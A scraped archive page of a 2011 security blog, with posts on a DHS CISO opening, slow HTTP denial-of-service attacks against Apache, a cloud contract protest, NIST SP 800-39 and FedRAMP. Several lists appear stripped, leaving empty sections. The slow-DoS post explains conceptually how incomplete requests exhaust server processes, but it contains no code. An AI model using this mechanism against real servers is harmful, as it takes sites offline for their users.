DHS is Looking for a CISO
Posted November 4th, 2011 by rybolovPosted in FISMA, NIST, Odds-n-Sods | 1 Comment »
Tags: compliance • government • infosec • itsatrap • job • NIST • risk • security
Posted in FISMA, NIST, Odds-n-Sods | 1 Comment »
Tags: compliance • government • infosec • itsatrap • job • NIST • risk • security
Usually when you think about Denial of Service attacks nowadays, most people think up images of the Anonymous kids running their copy of LOIC in a hivemind or Russian Gangsters building a botnet to run an online protection racket. Now there is a new-ish type of attack technique floating around which I believe will become more important over the next year or two: the slow http attacks.
Refs:
How Slow DOS Works
Webservers run an interesting version of process management. When you start an Apache server, it starts a master process that spawns a number of listener processes (or threads) as defined by StartServers (5-10 is a good starting number). Each listener serves a number of requests, defined by MaxRequestsPerChild (1000 is a good number here), and then dies to be replaced by another process/thread by the master server. This is done so that if there are any applications that leak memory, they won’t hang. As more requests are received, more processes/threads are spawned up to the MaxClients setting. MaxClients is designed to throttle the number of processes so that Apache doesn’t forkbomb and the OS become unmanageable because it’s thrashing to swap. There are also some rules for weaning off idle processes but those are immaterial to what we’re trying to do today.
What happens in a slow DOS is that the attack tools sends an HTTP request that never finishes. As a result, each listener process never finishes its quota of MaxRequestsPerChild so that it can die. By sending a small amount of never-complete requests, Apache gladly spawns new processes/threads up to MaxClients at which point it fails to answer requests and the site is DOS’ed. The higher the rate of listener process turnover, the faster the server stops answering requests. For a poorly tuned webserver configuration with MaxClients set too high, the server starts thrashing to swap before it hits MaxClients and to top it off, the server is unresponsive even to ssh connections and needs a hard boot.
The beauty of this is that the theoretical minimum number of requests to make a server hang for a well-tuned Apache is equal to MaxClients. This attack can also take out web boundary devices: reverse proxies, Web Application Firewalls, Load Balancers, Content Switches, and anything else that receives HTTP(S).
Post photo by Salim Virji.
Advantages to Slow DOS Attacks
There are a couple of reasons why slow DOS tools are getting research and development this year and I see them growing in popularity.
Defenses
This part is fun, and by that I mean “it sucks”. There are some things that help, but there isn’t a single solution that makes the problem go away.
Posted in Cyberwar, DDoS, Hack the Planet, Technical | 7 Comments »
Tags: apache • ddos • infosec • pwnage • risk • scalability • security
Interesting blog post on Microsoft’s TechNet, but the real gem is the case filing and summary from the DoJ (usual .pdf caveat applies). Basically the Reader’s Digest Condensed Version is that the Department of Interior awarded a cloud services contract to Microsoft for email. The award was protested by Google for a wide variety of reasons, you can go read the full thing for all the whinging.
But this is the interesting thing to me even though it’s mostly tangential to the award protest:
So this is where I start thinking. I thunk until my thinker was sore, and these are the conclusions I came to:
And then there’s the “back story” consisting of the Cobell case and how Interior was disconnected from the Internet several times and for several years. The Rybolov interpretation is that if Google’s government cloud potentially has tribes as a tenant, it increases the risk (both data security and just plain politically) to Interior beyond what they are willing to accept.
Obligatory Cloud photo by jonicdao.
Posted in FISMA, NIST, Outsourcing | 2 Comments »
Tags: 800-37 • 800-53 • accreditation • certification • cloud • cloudcomputing • compliance • fisma • government • infosec • management • NIST • risk • security
You should have seen Special Publication 800-39 (PDF file, also check out more info on Fismapedia.org) out by now. Dan Philpott and I just taught a class on understanding the document and how it affects security managers out them doing their job on a daily basis. While the information is still fresh in my head, I thought I would jot down some notes that might help everybody else.
The Good:
NIST is doing some good stuff here trying to get IT Security and Information Assurance out of the “It’s the CISO’s problem, I have effectively outsourced any responsibility through the org chart” and into more of what DoD calls “mission assurance”. IE, how do we go from point-in-time vulnerabilities (ie, things that can be scored with CVSS or tested through Security Test and Evaluation) to briefing executives on what the risk is to their organization (Department, Agency, or even business) coming from IT security problems. It lays out an organization-wide risk management process and a framework (layer cakes within layer cakes) to share information up and down the organizational stack. This is very good, and getting the mission/business/data/program owners to recognize their responsibilities is an awesome thing.
The Bad:
SP 800-39 is good in philosophy and a general theme of taking ownership of risk by the non-IT “business owners”, when it comes to specifics, it raises more questions than it answers. For instance, it defines a function known as the Risk Executive. As practiced today by people who “get stuff done”, the Risk Executive is like a board of the Business Unit owners (possibly as the Authorizing Officials), the CISO, and maybe a Chief Risk Officer or other senior executives. But without the context and asking around to find out what people are doing to get executive buy-in, the Risk Executive seems fairly non-sequitor. There are other things like that, but I think the best summary is “Wow, this is great, now how do I take this guidance and execute a plan based on it?”
The Ugly:
I have a pretty simple yardstick for evaluating any kind of standard or guideline: will this be something that my auditor will understand and will it help them help me? With 800-39, I think that it is written abstractly and that most auditor-folk would have a hard time translating that into something that they could audit for. This is both a blessing and a curse, and the huge recommendation that I have is that you brief your auditor beforehand on what 800-39 means to them and how you’re going to incorporate the guidance.
Posted in FISMA, NIST, Risk Management, What Works | 5 Comments »
Tags: 800-37 • 800-39 • accreditation • assurance • auditor • C&A • certification • comments • compliance • datacentric • fisma • government • infosec • management • NIST • risk • scalability • security
“Cloud computing is about gracefully losing control while maintaining accountability even if the operational responsibility falls upon one or more third parties.”
–CSA Security Guidance for Critical Areas of Focus in Cloud Computing V2.1
Now enter FedRAMP. FedRAMP is a way to share Assessment and Authorization information for a cloud provider with its Government tenants. In case you’re not “in the know”, you can go check out the draft process and supporting templates at FedRAMP.gov. So far a good idea, and I really do support what’s going on with FedRAMP, except for somewhere along the lines we went astray because we tried to kluge doctrine that most people understand over the top of cloud computing which most people also don’t really understand.
I’ve already done my part to submit comments officially, I just want to put some ideas out there to keep the conversation going. As I see it, these are/should be the goals for FedRAMP:
So now for the juicy part, how I would do a “clean room” implementation of FedRAMP on Planet Rybolov, “All the Authorizing Officials are informed, the Auditors are helpful, and every ISSO is above average”? This is my “short list” of how to get the job done:
Then there is the special interest comment: I’ve heard some rumblings (and read some articles, shame on you security industry press for republishing SANS press releases) about how FedRAMP would be better accomplished by using the 20 Critical Security Controls. Honestly, this is far from the truth: a set of controls scoped to the modern enterprise (General Support System supporting end users) or project (Major Application) does not scale to an infrastructure-and-server cloud. While it might make sense to use 20 CSC in other places (agency-wide controls), please do your part to squash this idea of using it for cloud computing whenever and wherever you see it.
Ramp photo by ell brown.
Posted in FISMA, Risk Management, What Works | 2 Comments »
Tags: accreditation • C&A • catalogofcontrols • certification • cloud • cloudcomputing • comments • compliance • fisma • infosec • infosharing • management • risk • scalability • security
Joan Goodchild interviewed me about some of my experiences in the big sandbox and how I was good enough at avoiding IEDs to make it there and home again–an abstract form of risk management. Go check it out. And while you’re on the subject or for visuals to go along with the story, check out my Afghanistan set on Flickr, a random set of them are below….
Posted in Army, Risk Management | 1 Comment »
Tags: risk • security • speaking